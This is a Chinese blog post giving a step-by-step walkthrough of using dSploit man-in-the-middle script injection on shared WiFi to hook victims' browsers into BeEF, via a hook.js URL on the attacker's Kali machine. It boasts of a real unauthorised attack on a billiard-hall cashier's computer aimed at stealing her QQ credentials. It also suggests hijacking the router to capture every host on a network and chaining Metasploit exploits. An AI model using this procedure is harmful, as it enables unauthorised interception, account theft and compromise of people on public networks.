强制性获取无线网内所有电脑shell

前言:

今年五月份去广州与兄弟玩的时候,我们去打桌球,看见收银员妹子不错哦。

然后我就想试着能拿到QQ号码不。所以我想起了wifi

打开wifi、密码被万能钥匙所收录、所以我链接上去后,果断开启dSploit、

因为就收银台一台电脑、我很快就看到妹子电脑的IP了、果断劫持、

我想,劫持什么的好麻烦的说。想获取妹子的QQkey、于是乎我想到dSploit里的脚本注入、

因为之前都玩过么,就是浏览器浏览页面的时候弹js、我想能不能试着把语句改成xss的地址、说着就做了、

功夫不负有心人,果然可以哦、附图

mz001

成功打到了、、

然而最近我看到我这图的时候,就想到能不能用dSploit配合beef或者metasploit呢?

想法有了,就试着做把,可惜,这两天下雨、连续两天的停电,伤不起啊、

不过还是成功的实现了,我用的是dSploit配合beef

过程就看下面的图吧

beef001

 

这是我卡利里的beef,现在是没有主机的

sfdsf24

 

这是我虚拟机里的xp系统,IP是:192.168.1.106

接下来我们去手机界面看看

51sda3

 

我们可以看到我们的目标IP,我们选中

62assf

 

选中后,我们再选择MITM

7sdfw1

 

接下来就是脚本注入了

8dasfdas

 

选择脚本注入,我们自定义代码、

我卡利的IP是192.168.1.105,而beef的默认端口是3000,以及木马是后面加上hook.js

也就是http://192.168.1.105:3000/hook.js

然后我们点击完成、就运行了

我们去xp系统随便打开页面,就基本中招了

31fewff

 

如上图,随便打开,百度啊,贴吧啊什么的都行

44525dsf

回到卡利,神奇的事情就发生了,主机上线了,接下来我就不多说了,

这里我只是做个例子,拿一台电脑做实验,如果如题所说是全部,就直接劫持路由器,在dSploit里点击路由IP就行。其他操作一样。

Beef可以本身有很多exploit,而且他可以加载metasploit的模块、

所以你可以利用目标电脑的信息进行溢出了。、、

告诉你们,beef是很强大的公牛哦、、以后手机装上卡利或者BT5,或者笔记本什么的,各种内网渗透了、、、

By:Morker

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/5104.html

强制性获取无线网内所有电脑shell:目前有3 条留言

  1. 0楼
    LinghtNing:

    看不懂啊 。怎么学啊 靠

    2015-02-11 14:44 [回复]
  2. 0楼
    江灼文:

    我就看到了这个强制进来看的。

    2014-08-09 07:37 [回复]

发表评论

8 + 0 =

快捷键:Ctrl+Enter